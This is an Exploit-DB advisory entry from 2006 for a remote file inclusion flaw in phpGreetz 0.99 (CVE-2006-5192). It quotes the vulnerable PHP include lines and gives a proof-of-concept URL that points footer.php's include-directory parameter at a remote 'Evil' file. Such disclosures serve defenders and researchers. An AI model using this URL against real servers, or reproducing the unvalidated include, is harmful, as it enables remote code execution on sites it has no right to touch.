phpGreetz <= 0.99 footer.php Remote File Include Vulnerability

2006-10-04T00:00:00
ID EDB-ID:2476
Type exploitdb
Reporter mozi
Modified 2006-10-04T00:00:00

Description

phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability. CVE-2006-5192. Webapps exploit for php platform

                                        
                                            # Author: mozi2weed@yahoo.com mozi
# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
----------------------------------------------------------------
Download: http://sourceforge.net/project/showfiles.php?group_id=6127
------------------------------------------------------------------
&lt;? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?&gt;
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
&lt;td colspan="2" valign="top" align="left"&gt;&lt;? include($site_location . "/includes/navigation.php"); ?&gt;
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team
RaVeR -- nutzulake@yahoo.com
mozi -- mozi2weed@yahoo.com mozilla0@hotmail.com
 
#phpfreaks again
# heh tnx

# milw0rm.com [2006-10-04]